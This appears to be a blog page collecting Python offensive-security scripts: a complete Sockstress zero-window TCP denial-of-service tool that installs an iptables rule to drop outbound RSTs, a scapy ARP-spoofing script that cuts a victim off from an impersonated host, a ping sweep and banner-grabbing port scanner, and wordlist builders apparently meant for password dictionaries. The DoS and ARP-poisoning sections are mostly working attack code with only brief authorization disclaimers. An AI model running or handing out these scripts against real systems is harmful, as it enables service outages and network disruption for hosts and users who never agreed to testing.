SockStress DoS – Python

Sockstress is a resource-exhaustion denial-of-service attack against TCP services. The client completes the three-way handshake but advertises a zero receive window (the `window=0` ACK in the script below), so the server holds the established connection and its buffers while it waits for a window update that never comes; repeated from many source ports this drains the service's resources. Only run it against hosts you own or are explicitly authorized to test, and remove the iptables rule the script installs when you are done.



 

#!/usr/bin/python

'''
author: Hopeless
task: SockStress DoS !
Only for use against systems you are explicitly authorized to test.
'''

import atexit
import logging
import os
import random
import subprocess
import sys
import thread
import threading
from time import sleep

from scapy.all import *

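# Quiet scapy's runtime logger (e.g. "No route found" / IPv6 warnings).
# NOTE: this runs after `from scapy.all import *` above, so it only silences
# messages emitted from now on, not the warnings scapy printed while importing.
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

if len(sys.argv) != 4:
    print("Usage - ./sockstress.py [Victim-IP] [Port Num] [Threads Num]")
    print("Example - ./sockstress.py 192.168.0.50 21 15")
    print("Make sure beforehand that the port responds")
    print("\nMake sure you remove the new rule created from iptables after you are using this program")
    sys.exit()

victim = str(sys.argv[1])
portd = int(sys.argv[2])
threads = int(sys.argv[3])

# The kernel has no socket for our forged SYNs, so it would answer the
# victim's SYN/ACK with a RST and tear the connection down before the
# zero-window ACK lands.  Drop outbound RSTs to this one host only.
# The rule is built as an argv list (no shell), so the victim string from
# the command line cannot be turned into extra shell commands.
RST_DROP_RULE = ["-p", "tcp", "--tcp-flags", "RST", "RST", "-d", victim, "-j", "DROP"]
if subprocess.call(["iptables", "-A", "OUTPUT"] + RST_DROP_RULE) != 0:
    # Without the rule the attack cannot work, so do not start it.
    sys.exit("Could not add the iptables RST-drop rule (are you root?), aborting.")


def _remove_rst_rule():
    """Delete the OUTPUT rule added above so the host is not left dropping RSTs."""
    subprocess.call(["iptables", "-D", "OUTPUT"] + RST_DROP_RULE)


# Remove the rule on interpreter exit, including the Ctrl+C that stops the
# attack (KeyboardInterrupt unwinds the main thread; atexit handlers still run).
atexit.register(_remove_rst_rule)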

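# Starting attack
def sockstress(victim, portd):
    """Worker loop: keep opening zero-window connections to victim:portd.

    Each iteration sends a SYN from a random source port, waits up to one
    second for the SYN/ACK and completes the handshake with an ACK that
    advertises a zero window plus two bytes of payload, so the victim is
    meant to keep the connection (and its buffers) allocated while it waits
    for a window update.  Runs until the process exits; it is started in
    several daemon threads by the main script.

    Only use against hosts you are explicitly authorized to test.
    """
    while True:
        try:
            sport = random.randint(0, 65535)
            # The kernel would normally RST the SYN/ACK to this forged SYN;
            # the iptables rule installed at startup drops those RSTs.
            synack = sr1(IP(dst=victim) / TCP(sport=sport, dport=portd, flags="S"),
                         timeout=1, verbose=0)
            if synack is None or TCP not in synack:
                # No usable answer within the timeout (closed, filtered, or
                # dropped under load); the original hit this as an exception.
                continue
            send(IP(dst=victim)
                 / TCP(sport=sport, dport=portd, window=0, flags="A",
                       ack=synack[TCP].seq + 1)
                 / "\x00\x00",
                 verbose=0)
        except Exception:
            # Best effort: a send/receive error on one probe must not kill
            # the worker thread.  (The original used a bare `except: pass`.)
            continue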

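#multiple threads attack
print("The onslaught has begun...use Ctrl+C to stop the attack")
print("\nMake sure you remove the new rule created from iptables after you are using this program")
for _ in range(threads):
    # Daemon threads so Ctrl+C can end the process without joining the
    # never-ending worker loops (same lifetime as thread.start_new_thread).
    worker = threading.Thread(target=sockstress, args=(victim, portd))
    worker.daemon = True
    worker.start()

# Stop only if you press Ctrl+C
try:
    while True:
        sleep(1)
except KeyboardInterrupt:
    # Spell out the exact cleanup so the RST-drop rule is not left behind.
    print("\nStopped. Remove the firewall rule with:")
    print("  iptables -D OUTPUT -p tcp --tcp-flags RST RST -d %s -j DROP" % victim)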

 


ARP Poison – Python

ARP Poisoning
ARP poisoning works by sending forged ARP messages so that hosts on the segment associate an IP address with the attacker's MAC address. Instead of posing as the gateway and forwarding traffic (a man-in-the-middle), the attacker can simply not forward the packets it attracts, so the victim is denied access to the impersonated network resource. The script below does exactly the latter: it sends a single spoofed ARP request and forwards nothing, so its effect is a denial of service that lasts until the victim's ARP cache entry is corrected or expires.

Used:
from scapy.all import *
import sys


 

 

 

#!/usr/bin/python

'''
author: Hopeless
task: Arp poison !
Only for use on networks you are explicitly authorized to test.
'''

from scapy.all import *
import sys

def get_mac_add():
    """Return the MAC address of the first interface that is not all-zeros.

    Interfaces come from scapy's get_if_list(); the loopback interface
    reports 00:00:00:00:00:00 and is skipped.  Returns None when no interface
    has a usable hardware address (the caller treats that as an error).
    """
    hwaddrs = (get_if_hwaddr(iface) for iface in get_if_list())
    for hwaddr in hwaddrs:
        if hwaddr != "00:00:00:00:00:00":
            return hwaddr
    return None
Timeout = 3  # not used anywhere in this script; kept as-is

if len(sys.argv) != 3:
    print("Usage: arppois.py VICTIM-IP IP-TO-IMPERSONATE")
    sys.exit(1)

victim_ip, spoofed_ip = sys.argv[1], sys.argv[2]

my_mac = get_mac_add()
if not my_mac:
    print("Error, Cant get local mac address")
    sys.exit(1)

# A single ARP "who-has" request that claims spoofed_ip lives at our MAC
# (hwsrc/psrc), addressed to the victim (pdst).  The Ether() layer is left at
# scapy's defaults.  Nothing here forwards traffic, so once the victim takes
# the bogus mapping it loses reachability to spoofed_ip until its ARP cache
# entry is corrected or expires: a denial of service, not a transparent
# man-in-the-middle.  Sending raw frames requires root.
spoofed_request = ARP(op="who-has", hwsrc=my_mac, psrc=spoofed_ip, pdst=victim_ip)
pkt = Ether() / spoofed_request

sendp(pkt)

 

 

 

Port scanner and banner grabber – Python

Port scanner and banner grabber:

Ping sweep and port banner grabber. The tool can:
    - test whether an IP is online (one ICMP echo request; a host that drops ICMP is treated as down and is not port-scanned)
    - check whether each requested port is open on the hosts that answered
    - print the banner a service sends on connect, when it sends one
    - export all findings to a file

    The target can be given as a single IP, a CIDR block (ip/prefix), a last-octet range (e.g. 10.0.0.1-15) or a hostname/URL.
    Ports can be given as a comma-separated list with -p; otherwise the built-in recommended list is scanned.
    The output file can be chosen with -o; otherwise the results are saved to save.txt.

Used: import sys , socket , getopt , subprocess
from scapy.all import *
from netaddr import *
from datetime import datetime


#!/usr/bin/python

'''
author: Hopeless
task: ping scanner and port banners
The software can perform:
- test whether an IP is online (ICMP echo)
- check whether a port is open on each online IP
- show the banner of each open port, if the service sends one
- export all scan results to a file

The target can be an IP, a CIDR block (ip/prefix), a last-octet range (ip-range) or an http URL.
Ports can be given as a list with -p; otherwise the recommended port list is scanned.
The output file name can be chosen with -o; otherwise results are saved automatically.

'''
import sys, socket , getopt ,subprocess
from scapy.all import *
from netaddr import *
from datetime import datetime

# clear the screen (constant command string, nothing user-controlled reaches the shell)
subprocess.call('clear', shell=True)

# Seconds to wait for a TCP connect/recv (socket default, used by getBanner)
# and for the ICMP echo reply (TIMEOUT, used by isAlive).
TIMEOUT = 2
socket.setdefaulttimeout(TIMEOUT)

# Silence scapy's per-packet output.
conf.verb = 0

# Ports scanned when -p is not given.
portlist = [20, 21, 22, 25, 3389, 80, 443]

# Command-line options with the program name stripped, and shared scan state.
argv = sys.argv[1:]
subnet = []            # filled from -i below
output = 'save.txt'    # overridden by -o
answers = []           # ('ip:', ip, 'port:', port, 'banner:', banner) findings
liveIPs = []           # hosts that answered the ICMP probe

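#Checking what has been entered
USAGE_HINT = 'portscanner.py -i ip/sider or ip-range or http \nfor more exmple use : portscanner.py -h'
try:
    opts, args = getopt.getopt(argv, 'hi:p:o:')
except getopt.GetoptError:
    print(USAGE_HINT)
    sys.exit(2)

for option, arg in opts:
    # Compare options exactly; the original used `option in '-h'`, which is a
    # substring test and only worked by accident.
    if option == '-h':
        print('\nexmple:')
        print('portscanner.py -i 10.0.0.1/24 or 10.0.0.1-15 or http://www.ynet.co.il \n')
        print('-p 20,22,100,101 \n(if this option is not selected, automatically are who chose the recommended port)\n')
        print('-o save.txt \n(if this option is not selected, automatically this file save in save.txt)\n')
        print('for exmple:\nportscanner.py -i 10.0.0.1-3 -p 22,3389 -o ports.txt')
        sys.exit()
    elif option == '-i':
        subnet = arg
    elif option == '-o':
        output = arg
    elif option == '-p':
        # Comma-separated port list.  Reject anything that is not a valid TCP
        # port number with a message instead of a traceback from int().
        portadd = []
        for portsplit in arg.split(','):
            try:
                port = int(portsplit)
            except ValueError:
                port = -1
            if not 0 < port < 65536:
                print('bad port %r in -p, ports must be numbers between 1 and 65535' % portsplit)
                sys.exit(2)
            portadd.append(port)
        portlist = portadd
    else:
        print(USAGE_HINT)
        sys.exit()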

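#checks if ip/sider or ip-range or http
def _expand_last_octet_range(spec):
    """Expand 'A.B.C.D-E' into ['A.B.C.D', ..., 'A.B.C.E'] (last octet only).

    The end of the range is a bare last octet, as in the -h example
    (10.0.0.1-15); a full dotted end address is not supported and raises
    ValueError like any other malformed spec.
    """
    start, end = spec.split('-', 1)
    octets = start.split('.')
    if len(octets) != 4:
        raise ValueError('bad range start %r' % start)
    prefix = '.'.join(octets[:3]) + '.'
    return [prefix + str(i) for i in range(int(octets[3]), int(end) + 1)]


def _hostname_from_url(spec):
    """Strip an optional scheme ('http://') and path from a host spec.

    socket.gethostbyname() only accepts a bare host name, so
    'http://www.example.com/page' becomes 'www.example.com'.
    """
    host = spec.split('://', 1)[-1]
    return host.split('/', 1)[0]


if subnet:
    try:
        subnet = IPNetwork(subnet)
    except Exception:
        if '-' in subnet:
            try:
                subnet = _expand_last_octet_range(subnet)
            except ValueError:
                print('bad ip or url , for help (portscanner.py -h)')
                sys.exit()
        elif subnet[0].isalpha():
            # BUG FIX: the original resolved `arg` -- the value of whichever
            # option getopt parsed last (e.g. the -o file name) -- instead of
            # the -i value, and passed the raw URL including its scheme, which
            # gethostbyname() cannot resolve.
            try:
                subnethost = socket.gethostbyname(_hostname_from_url(subnet))
            except socket.error:
                print('bad ip or url , for help (portscanner.py -h)')
                sys.exit()
            subnet = IPNetwork(subnethost)
        else:
            print('bad ip or url , for help (portscanner.py -h)')
            sys.exit()

# No -i given (or it expanded to nothing): there is nothing to scan.
if not subnet:
    print('portscanner.py -i ip/sider or ip-range or http')
    print('for exmple:\nportscanner.py -i 10.0.0.1-3 -p 22,3389 -o ports.txt')
    print('for more exmple use : portscanner.py -h')
    sys.exit(2)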

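# Checking reply address from ip
def isAlive(ip):
    """Send one ICMP echo request to `ip` and add it to liveIPs if it answers.

    A host counts as online only when the reply is an ICMP echo-reply
    (type 0).  scapy's sr1() also returns ICMP errors such as
    destination-unreachable as "answers"; those come from a router, and the
    original code would then have listed the router's address as online.
    Prints the result either way and returns the shared liveIPs list.
    """
    ppkt = IP(dst=ip, ttl=64) / ICMP()
    # wait up to TIMEOUT seconds for an answer (None on timeout)
    reply = sr1(ppkt, timeout=TIMEOUT)
    if reply is not None and reply.haslayer(ICMP) and reply[ICMP].type == 0:
        print('%s [+] is online' % reply[IP].src)
        liveIPs.append(reply[IP].src)
    else:
        print('%s [-] timed out' % ip)

    return liveIPs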

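#Checking reply port, if it gives banner
def getBanner(ip, portlist):
    """Try each port in `portlist` on `ip`; record open ports and their banner.

    For every port a fresh TCP socket is connected using the default socket
    timeout set at startup.  On success up to 1024 bytes are read as the
    banner.  Services that wait for the client to speak first (HTTP, RDP,
    ...) send nothing, so that read times out; the original caught the
    timeout with its blanket handler and reported the OPEN port as
    "bad port".  Such ports are now recorded with an empty banner.  Findings
    are appended to the shared `answers` list as
    ('ip:', ip, 'port:', port, 'banner:', banner); the socket is always closed.
    """
    for port in portlist:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            if s.connect_ex((ip, port)) != 0:
                continue  # closed or filtered: nothing to report
            try:
                ans = s.recv(1024)
            except socket.timeout:
                ans = ''  # open, but the service waits for us to talk first
            print("Port {}: Open".format(port))
            print('found -> ip: %s port: %s banner: %s' % (ip, port, str(ans)))
            answers.append(('ip:', ip, 'port:', port, 'banner:', str(ans)))
        except Exception:
            # A connection/resolution error on one port must not abort the
            # rest of the scan.
            print('bad port %s , please try again...' % port)
        finally:
            s.close()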

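# main func
if __name__ == '__main__':
    # Check the time at started
    t1 = datetime.now()
    # Probe every address in the -i target; isAlive() fills liveIPs as a side effect.
    for ip in subnet:
        isAlive(str(ip))
    # Grab banners only from hosts that answered the ICMP probe, so a host
    # that drops ICMP is never port-scanned.
    for ip in liveIPs:
        getBanner(ip, portlist)
    # Saves the file.  `with` closes (and flushes) it even if the write fails,
    # so the findings are not lost in an unflushed buffer.
    with open(output, "w") as save:
        save.write(str(answers))

    # Checking the time again and report the elapsed time
    t2 = datetime.now()
    total = t2 - t1
    print('scanning completed in: %s' % total)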

Example (scapy needs raw sockets, so run it with sudo):

hopeless@ubuntu:~/python$ sudo ./portscanner.py -i 172.16.14.0/24 -p 20,21,22


Source code …
portscanner.py

Get dictionary from file/url – Python

Get dictionary from file:

This program extracts every "word" (3-15 characters of letters, digits or underscore) from a text file and saves the unique words to realdic.txt, one per line, for use as a wordlist.

Used: import (sys, os, re) , if , try , for , except , else


 

#!/usr/bin/python
'''
author: Hopeless
task: Write a program that takes a file and generates a wordlist
prog will get all words from any text file
'''

import sys, os, re

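wordlist = []
# A "word" is 3-15 chars of [0-9a-zA-Z_] that is followed by whitespace, a
# backslash or a dot; a word at the very end of a line that has no trailing
# newline is therefore not captured.
WORD_RE = re.compile(r'([0-9a-zA-Z_]{3,15})[\s\\\.]')

if len(sys.argv) < 2:
    # The original fell through with `filex` undefined and crashed with a
    # NameError at filex.close(); print a usage line instead.
    print('Usage: %s FILE' % sys.argv[0])
    sys.exit(1)

try:
    # `with` closes the input even when reading fails part way through.
    with open(sys.argv[1], 'r') as filex:
        for line in filex:
            wordlist += WORD_RE.findall(line)
except Exception as e:
    print(e)
    # Non-zero so a calling script can tell the failure from success
    # (the original exited with 0 here).
    sys.exit(1)

wordset = set(wordlist)

print(wordset)
print('dic length is:  %d' % len(wordset))

#save wordset to file -> newline for each item (set order is arbitrary)
with open('realdic.txt', 'w') as realdic:
    for word in wordset:
        realdic.write(word + '\n')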

 

hopeless@ubuntu:~/python$ wget https://en.wikipedia.org/wiki/Israel
hopeless@ubuntu:~/python$ ./baddic.py Israel
(all results are saved to the file "realdic.txt", one word per line)


another way to get dictionary from file:

This program does the same with the word extraction and the saving split into functions; the unique words are written to test1.dic, one per line.

Used: def , import (sys, os, re) , if , try , for , except , else


 

#!/usr/bin/python
'''
author: Hopeless
task: prog will get all words from any text file
'''

import sys, os, re

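if len(sys.argv) > 1:
    try:
        filex = open(sys.argv[1], 'r')
    except Exception as e:
        print(e)
        # Non-zero so a calling script can tell the failure from success
        # (the original exited with 0 here).
        sys.exit(1)
else:
    # The original fell through with `filex` undefined and crashed with a
    # NameError at the first use; fail with a usage line instead.
    print('Usage: %s FILE' % sys.argv[0])
    sys.exit(1)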
# filename = raw_input(‘please enter filename to parse:’)

def text2dic(filename):
    """Collect the unique "words" found in an iterable of text lines.

    `filename` is, despite its name, an open file (or any iterable of
    strings).  A word is 3-15 characters from [0-9a-zA-Z_] that is followed
    by whitespace, a backslash or a dot; all matches are deduplicated into
    a set, which is returned.
    """
    pattern = r'([0-9a-zA-Z_]{3,15})[\s\\\.]'
    words = set()
    for line in filename:
        words.update(re.findall(pattern, line))
    return words

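def savedic(listname, filename):
    """Write each item of `listname` to `filename`, one per line.

    The file is opened with `with`, so it is closed (and partial output
    flushed) even if a write fails; the original closed it only on success.
    On any error the message is printed and the program exits with status 1
    (the original exited with 0, hiding the failure from calling scripts).
    """
    try:
        with open(filename, 'w') as realdic:
            for word in listname:
                realdic.write(word + '\n')
    except Exception as e:
        print(e)
        sys.exit(1)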

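# Extract, save and report; the input file is closed even if a step fails
# (the original only closed it on the success path).
try:
    newdic = text2dic(filex)
    savedic(newdic, 'test1.dic')

    print(newdic)
    print('dic length is:  %d' % len(newdic))
finally:
    filex.close()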

 

hopeless@ubuntu:~/python$ wget https://en.wikipedia.org/wiki/Israel
hopeless@ubuntu:~/python$ ./dicfuncs.py Israel
(all results are saved to the file "test1.dic", one word per line)


Get dictionary from url:

This program fetches a URL and extracts every "word" (3-15 characters of letters, digits or underscore) from the response, saving the unique words to realdic.txt, one per line.

Used: import (sys, os, re) , if , try , for , except , else


#!/usr/bin/python

'''
author: Hopeless
task: prog will get all words from any url
'''

import sys, os, re
from urllib2 import urlopen
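wordlist = []
# A "word" is 3-15 chars of [0-9a-zA-Z_] followed by whitespace, a backslash
# or a dot (so a word at the very end of the response is not captured).
WORD_RE = re.compile(r'([0-9a-zA-Z_]{3,15})[\s\\\.]')

if len(sys.argv) < 2:
    # The original fell through with `urlf` undefined and crashed with a
    # NameError at urlf.close(); print a usage line instead.
    print('Usage: %s URL' % sys.argv[0])
    sys.exit(1)

try:
    # BUG FIX: urlopen(url, 'r') passed 'r' as urlopen's `data` argument,
    # which turns the request into a POST with body "r"; the page was being
    # fetched with the wrong method.  NOTE(review): urllib2 follows
    # redirects and, before Python 2.7.9, does not verify HTTPS certificates,
    # so only feed it URLs you trust.
    urlf = urlopen(sys.argv[1])
    try:
        for line in urlf:
            wordlist += WORD_RE.findall(line)
    finally:
        urlf.close()
except Exception as e:
    print(e)
    # Non-zero so a calling script can tell the failure from success
    # (the original exited with 0 here).
    sys.exit(1)

wordset = set(wordlist)

print(wordset)
print('dic length is:  %d' % len(wordset))

#save wordset to file -> newline for each item (set order is arbitrary)
with open('realdic.txt', 'w') as realdic:
    for word in wordset:
        realdic.write(word + '\n')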

hopeless@ubuntu:~/python$ ./passdicurl.py https://en.wikipedia.org/wiki/Israel
(all results are saved to the file "realdic.txt", one word per line)


Results!